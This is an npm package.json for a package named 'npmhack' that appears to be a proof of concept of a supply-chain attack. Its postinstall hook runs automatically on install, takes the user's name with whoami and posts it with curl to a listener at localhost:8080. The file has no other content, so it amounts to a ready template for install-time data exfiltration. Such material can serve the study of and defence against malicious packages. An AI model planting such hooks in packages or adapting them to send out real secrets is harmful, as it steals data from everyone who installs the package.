{
  "name": "npmhack",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "postinstall": "echo '{\"Key\":\"'$(whoami)'\"}' | curl -d @- http://localhost:8080"
  },
  "keywords": [],
  "author": "",
  "license": "ISC"
}
